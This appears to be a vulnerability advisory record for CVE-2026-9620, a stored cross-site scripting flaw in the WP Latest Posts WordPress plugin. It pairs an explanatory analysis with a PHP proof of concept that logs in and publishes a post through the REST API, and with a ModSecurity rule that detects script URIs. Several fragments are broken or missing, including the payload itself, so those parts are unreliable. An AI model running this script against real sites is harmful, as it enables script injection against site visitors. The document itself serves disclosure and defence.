{
"analysis": "Atomic Edge analysis of CVE-2026-9620 (metadata-based): This vulnerability affects the WP Latest Posts plugin for WordPress versions up to 5.0.11. It allows authenticated attackers with author-level access or higher to inject stored cross-site scripting (XSS) via crafted image src attributes in post content. The CVSS score is 6.4, reflecting medium severity with network exploitation, low complexity, and a scope change.\n\nThe root cause lies in the plugin's field() and loop() functions. These functions extract the raw src attribute from tags in post_content using a regular expression. They then reconstruct new elements or CSS background-image declarations by directly concatenating the unescaped value. This bypasses WordPress's kses content filtering entirely. Atomic Edge analysis infers that the plugin does not use WordPress functions like esc_url() or esc_attr() on the extracted src value before outputting it. The CWE-79 classification confirms this is an input neutralization failure during page generation.\n\nExploitation requires an attacker with author-level capabilities to create or edit a post. The attacker crafts a post that contains an tag with a malicious src attribute. The payload might look like: or a more sophisticated vector using onerror or data URIs. When WP Latest Posts displays this post (via a widget or shortcode), the plugin extracts the src value and outputs it without sanitization, causing script execution in the browser of any user viewing the page. The attack vector is the plugin's content processing, not a specific AJAX endpoint.\n\nRemediation requires the plugin to properly escape the src attribute value before output. The fix should use WordPress's esc_url() for URL contexts or esc_attr() for HTML attribute contexts. Additionally, the plugin should avoid raw regex extraction from post_content and instead rely on WordPress's built-in content filtering functions (like wp_kses_post) to handle HTML safely. Since no patched version exists, site administrators should disable the plugin or restrict author-level access pending a fix.\n\nSuccessful exploitation allows execution of arbitrary JavaScript in the context of any user viewing a page that displays the infected post content. This can lead to session hijacking, cookie theft, phishing attacks, or defacement. Because the XSS is stored, the payload persists and affects all visitors, including administrators, potentially enabling privilege escalation via forged requests.",
"poc_php": "<?php\n// Atomic Edge CVE Research – Proof of Concept (metadata-based)\n// CVE-2026-9620 – WP Latest Posts $username,\n 'pwd' => $password,\n 'wp-submit' => 'Log In',\n 'redirect_to' => $target_url . '/wp-admin/',\n 'testcookie' => 1\n);\n\n$ch = curl_init();\ncurl_setopt($ch, CURLOPT_URL, $login_url);\ncurl_setopt($ch, CURLOPT_POST, true);\ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));\ncurl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');\ncurl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\ncurl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');\n$response = curl_exec($ch);\n\n// Step 2: Get the WP nonce and post editor URL\n$admin_ajax = $target_url . '/wp-admin/admin-ajax.php';\n\n// Step 3: Create a new post with XSS payload in image src\n// The payload: an img tag with a javascript: URI in the src attribute\n$post_title = 'Atomic Edge PoC CVE-2026-9620';\n$post_content = 'Sample text';\n\n// Use WordPress REST API to create the post (author level has permission)\n$rest_url = $target_url . '/wp-json/wp/v2/posts';\n\n$post_data = array(\n 'title' => $post_title,\n 'content' => $post_content,\n 'status' => 'publish'\n);\n\n$json_data = json_encode($post_data);\n\ncurl_setopt($ch, CURLOPT_URL, $rest_url);\ncurl_setopt($ch, CURLOPT_POST, true);\ncurl_setopt($ch, CURLOPT_POSTFIELDS, $json_data);\ncurl_setopt($ch, CURLOPT_HTTPHEADER, array(\n 'Content-Type: application/json',\n 'Content-Length: ' . strlen($json_data)\n));\ncurl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');\ncurl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\n$response = curl_exec($ch);\n\n$response_data = json_decode($response, true);\nif (isset($response_data['id'])) {\n echo \"[+] Post created successfully. Post ID: \" . $response_data['id'] . \"\\n\";\n echo \"[+] Visit the post to trigger XSS: \" . $response_data['link'] . \"\\n\";\n echo \"[+] If WP Latest Posts displays this post, the XSS will execute.\\n\";\n} else {\n echo \"[-] Failed to create post. Check credentials or permissions.\\n\";\n echo \"Response: \" . $response . \"\\n\";\n}\n\ncurl_close($ch);\n?>\n",
"modsecurity_rule": "# Atomic Edge WAF Rule – CVE-2026-9620 (metadata-based)\n# Block stored XSS via crafted image src in post content\n# This rule targets the REST API endpoint used for creating/updating posts with malicious src attributes\nSecRule REQUEST_URI \"@beginsWith /wp-json/wp/v2/posts\" \\\n \"id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-9620 Stored XSS via WP Latest Posts image src',severity:'CRITICAL',tag:'CVE-2026-9620'\"\n SecRule REQUEST_METHOD \"@streq POST\" \"chain\"\n SecRule ARGS:content \"@rx ]*src\\s*=\\s*['\\\"]?\\s*(?:javascript|data:text|vbscript|&#)\"\n"
}